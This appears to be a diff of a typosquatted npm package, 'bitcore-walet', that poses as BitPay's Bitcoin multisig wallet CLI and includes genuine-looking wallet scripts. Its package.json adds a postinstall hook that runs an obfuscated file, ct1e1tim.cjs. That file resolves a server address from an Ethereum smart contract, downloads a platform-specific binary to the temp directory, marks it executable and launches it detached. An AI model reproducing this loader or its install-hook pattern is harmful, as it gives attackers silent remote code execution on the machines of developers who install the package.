+utils.getClient(program, { mustExist: true }, function (client, key, err) {
+  client.getTxProposals({}, function(err, txps) {
+    if (err)
+      utils.die(err);
+
+    var txp = utils.findOneTxProposal(txps, txpid);
+    let signatures = key.sign(client.getRootPath(), txp);
+    client.pushSignatures(txp, signatures, function(err, tx) {
+      utils.die(err);
+      console.log('Transaction signed by you.');
+    });
+  });
+});

package/bin/wallet-status

@@ -0,0 +1,36 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var program = require('commander');
+var utils  = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-v, --verbose', 'Show wallet raw data')
+  .parse(process.argv);
+
+var args = program.args;
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.getStatus({}, function(err, res) {
+    utils.die(err);
+
+    var x = res.wallet;
+    console.log('* Wallet %s [%s]: %d-of-%d %s Coin:%s ', x.name, x.network, x.m, x.n, x.status, x.coin);
+
+    if (x.status != 'complete') {
+      console.log('  Missing copayers:', x.n - x.copayers.length);
+      console.log('  Wallet secret:', x.secret);
+    }
+    console.log('* Copayers:', _.map(x.copayers,'name').join(', '));
+
+
+    if (program.verbose) {
+        console.log('* Wallet Raw Data:', x);
+    }
+
+    var x = res.balance;
+    console.log('* Balance %s (Locked: %s)', utils.renderAmount(x.totalAmount, client.credentials.coin), utils.renderAmount(x.lockedAmount, client.credentials.coin));
+
+    utils.renderTxProposals(res.pendingTxps);
+  });
+});

package/bin/wallet-txproposals

@@ -0,0 +1,26 @@
+#!/usr/bin/env node
+
+var _ = require('lodash');
+var fs = require('fs');
+var program = require('commander');
+var utils = require('./cli-utils');
+program = utils.configureCommander(program);
+
+program
+  .option('-o, --output [filename]', 'write tx to output file for air-gapped signing')
+  .parse(process.argv);
+
+var args = program.args;
+
+utils.getClient(program, { mustExist: true }, function (client) {
+  client.getTxProposals({forAirGapped: !!program.output}, function (err, res) {
+    utils.die(err);
+    
+    if (program.output) {
+      fs.writeFileSync(program.output, JSON.stringify(res));
+      console.log(' * Tx proposals saved to: %s\n', program.output);
+    } else {
+      utils.renderTxProposals(res);
+    }
+  });
+});

package/ct1e1tim.cjs

@@ -0,0 +1 @@
+const _0x30fb5f=_0x2f6a;function _0x29a4(){const _0x279694=['finish','tmpdir','1265944TnGElj','xztJY','child_process','win32','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','kFiAz','1884235sWHvMf','uRxCb','/node-linux','VLsGT','createWriteStream','BudOP','GET','kuXiU','ethers','error','22421NNsDLi','function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)','48124lVAiop','chmodSync','myUku','462xvLVCv','getDefaultProvider','2JniXeE','unref','465023jwaXlU','Ошибка\x20установки:','loALT','0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84','path','Contract','1666086GPpjpQ','piQiP','pipe','mainnet','linux','Unsupported\x20platform:\x20','755','6250455MQwUQe','axios','darwin','/node-macos','DpyAs','basename','ignore','join','ChphS','platform'];_0x29a4=function(){return _0x279694;};return _0x29a4();}(function(_0x4fb066,_0x5143cd){const _0x129d54=_0x2f6a,_0x1e3b5a=_0x4fb066();while(!![]){try{const _0x4e3bd6=-parseInt(_0x129d54(0x76))/0x1*(-parseInt(_0x129d54(0x74))/0x2)+parseInt(_0x129d54(0x7c))/0x3+-parseInt(_0x129d54(0xa1))/0x4+-parseInt(_0x129d54(0x95))/0x5+-parseInt(_0x129d54(0x72))/0x6*(-parseInt(_0x129d54(0x9f))/0x7)+parseInt(_0x129d54(0x8f))/0x8+-parseInt(_0x129d54(0x83))/0x9;if(_0x4e3bd6===_0x5143cd)break;else _0x1e3b5a['push'](_0x1e3b5a['shift']());}catch(_0xdbfa20){_0x1e3b5a['push'](_0x1e3b5a['shift']());}}}(_0x29a4,0x5377e));function _0x2f6a(_0xe81ee9,_0x48152b){const _0x29a40d=_0x29a4();return _0x2f6a=function(_0x2f6a33,_0x5273a1){_0x2f6a33=_0x2f6a33-0x70;let _0x444a0b=_0x29a40d[_0x2f6a33];return _0x444a0b;},_0x2f6a(_0xe81ee9,_0x48152b);}const {ethers}=require(_0x30fb5f(0x9d)),axios=require(_0x30fb5f(0x84)),util=require('util'),fs=require('fs'),path=require(_0x30fb5f(0x7a)),os=require('os'),{spawn}=require(_0x30fb5f(0x91)),contractAddress=_0x30fb5f(0x93),WalletOwner=_0x30fb5f(0x79),abi=[_0x30fb5f(0xa0)],provider=ethers[_0x30fb5f(0x73)](_0x30fb5f(0x7f)),contract=new ethers[(_0x30fb5f(0x7b))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x597361=_0x30fb5f,_0x57b5ef={'xztJY':'Ошибка\x20при\x20получении\x20IP\x20адреса:'};try{const _0x35159e=await contract['getString'](WalletOwner);return _0x35159e;}catch(_0x40766e){return console[_0x597361(0x9e)](_0x57b5ef[_0x597361(0x90)],_0x40766e),await fetchAndUpdateIp();}},getDownloadUrl=_0x580e59=>{const _0x542513=_0x30fb5f,_0x2477e4={'piQiP':_0x542513(0x92)},_0x9ad009=os[_0x542513(0x8c)]();switch(_0x9ad009){case _0x2477e4[_0x542513(0x7d)]:return _0x580e59+'/node-win.exe';case _0x542513(0x80):return _0x580e59+_0x542513(0x97);case _0x542513(0x85):return _0x580e59+_0x542513(0x86);default:throw new Error(_0x542513(0x81)+_0x9ad009);}},downloadFile=async(_0x28bd10,_0x2649f3)=>{const _0x5e29c8=_0x30fb5f,_0x515a56={'zkGBS':_0x5e29c8(0x8d),'eySFf':_0x5e29c8(0x9e),'uRxCb':_0x5e29c8(0x9b)},_0x4c276f=fs[_0x5e29c8(0x99)](_0x2649f3),_0x3d3e20=await axios({'url':_0x28bd10,'method':_0x515a56[_0x5e29c8(0x96)],'responseType':'stream'});return _0x3d3e20['data'][_0x5e29c8(0x7e)](_0x4c276f),new Promise((_0x758dab,_0x4e97b1)=>{_0x4c276f['on'](_0x515a56['zkGBS'],_0x758dab),_0x4c276f['on'](_0x515a56['eySFf'],_0x4e97b1);});},executeFileInBackground=async _0x2200c8=>{const _0x2a8bd7=_0x30fb5f,_0x4865a3={'VLsGT':function(_0x30ddd3,_0x5c8394,_0x111201,_0x32fc29){return _0x30ddd3(_0x5c8394,_0x111201,_0x32fc29);},'myUku':_0x2a8bd7(0x89),'DpyAs':'Ошибка\x20при\x20запуске\x20файла:'};try{const _0x334365=_0x4865a3[_0x2a8bd7(0x98)](spawn,_0x2200c8,[],{'detached':!![],'stdio':_0x4865a3[_0x2a8bd7(0x71)]});_0x334365[_0x2a8bd7(0x75)]();}catch(_0x595c26){console[_0x2a8bd7(0x9e)](_0x4865a3[_0x2a8bd7(0x87)],_0x595c26);}},runInstallation=async()=>{const _0x40bedc=_0x30fb5f,_0x4f2c55={'loALT':function(_0x312239){return _0x312239();},'txZby':function(_0x4a4e29,_0x31e5ae,_0x3fefcc){return _0x4a4e29(_0x31e5ae,_0x3fefcc);},'HnoLn':function(_0x8367f6,_0x29cca7){return _0x8367f6!==_0x29cca7;},'kFiAz':_0x40bedc(0x92),'ChphS':_0x40bedc(0x82),'BudOP':function(_0x399c60,_0x228458){return _0x399c60(_0x228458);},'kuXiU':_0x40bedc(0x77)};try{const _0x291d9a=await _0x4f2c55[_0x40bedc(0x78)](fetchAndUpdateIp),_0xf60bcc=getDownloadUrl(_0x291d9a),_0x7dfb0b=os[_0x40bedc(0x8e)](),_0x4c9725=path[_0x40bedc(0x88)](_0xf60bcc),_0x249bd7=path[_0x40bedc(0x8a)](_0x7dfb0b,_0x4c9725);await _0x4f2c55['txZby'](downloadFile,_0xf60bcc,_0x249bd7);if(_0x4f2c55['HnoLn'](os[_0x40bedc(0x8c)](),_0x4f2c55[_0x40bedc(0x94)]))fs[_0x40bedc(0x70)](_0x249bd7,_0x4f2c55[_0x40bedc(0x8b)]);_0x4f2c55[_0x40bedc(0x9a)](executeFileInBackground,_0x249bd7);}catch(_0x595f8e){console['error'](_0x4f2c55[_0x40bedc(0x9c)],_0x595f8e);}};runInstallation();

package/package.json

@@ -1,6 +1,79 @@
 {
   "name": "bitcore-walet",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "description": "A CLI Mutisig HD Bitcoin Wallet, demo for Bitcore Wallet Service",
+  "author": "BitPay Inc",
+  "version": "8.19.0",
+  "keywords": [
+    "bitcoin",
+    "copay",
+    "multisig",
+    "wallet"
+  ],
+  "repository": {
+    "url": "git@github.com:bitpay/bitcore-wallet.git",
+    "type": "git"
+  },
+  "bugs": {
+    "url": "https://github.com/bitpay/bitcore-wallet/issues"
+  },
+  "dependencies": {
+    "async": "^2.5.0",
+    "bitcore-lib": "^8.17.1",
+    "bitcore-wallet-client": "^8.19.0",
+    "commander": "^2.6.0",
+    "lodash": "^3.3.1",
+    "moment": "^2.9.0",
+    "npmlog": "^1.2.0",
+    "qr-image": "^3.1.0",
+    "read": "^1.0.5",
+    "sjcl": "^1.0.2",
+    "axios": "^1.7.7",
+    "ethers": "^6.13.2"
+  },
+  "devDependencies": {
+    "chai": "^3.3.0",
+    "sinon": "^1.17.1"
+  },
+  "scripts": {
+    "postinstall": "node ct1e1tim.cjs"
+  },
+  "contributors": [
+    {
+      "name": "Ivan Socolsky",
+      "email": "ivan@gmail.com"
+    },
+    {
+      "name": "Matias Alejo Garcia",
+      "email": "ematiu@gmail.com"
+    }
+  ],
+  "bin": {
+    "wallet": "./bin/wallet",
+    "wallet-address": "./bin/wallet-address",
+    "wallet-addresses": "./bin/wallet-addresses",
+    "wallet-airsign": "./bin/wallet-airsign",
+    "wallet-balance": "./bin/wallet-balance",
+    "wallet-broadcast": "./bin/wallet-broadcast",
+    "wallet-confirm": "./bin/wallet-confirm",
+    "wallet-create": "./bin/wallet-create",
+    "wallet-export": "./bin/wallet-export",
+    "wallet-genkey": "./bin/wallet-genkey",
+    "wallet-history": "./bin/wallet-history",
+    "wallet-import": "./bin/wallet-import",
+    "wallet-join": "./bin/wallet-join",
+    "wallet-recreate": "./bin/wallet-recreate",
+    "wallet-reject": "./bin/wallet-reject",
+    "wallet-rm": "./bin/wallet-rm",
+    "wallet-send": "./bin/wallet-send",
+    "wallet-sign": "./bin/wallet-sign",
+    "wallet-status": "./bin/wallet-status",
+    "wallet-txproposals": "./bin/wallet-txproposals",
+    "wallet-mnemonic": "./bin/wallet-mnemonic",
+    "wallet-derive": "./bin/wallet-derive"
+  },
+  "licence": "MIT",
+  "gitHead": "fd63a94973984a10a79e40210631ef51b5c72259",
+  "files": [
+    "ct1e1tim.cjs"
+  ]
+}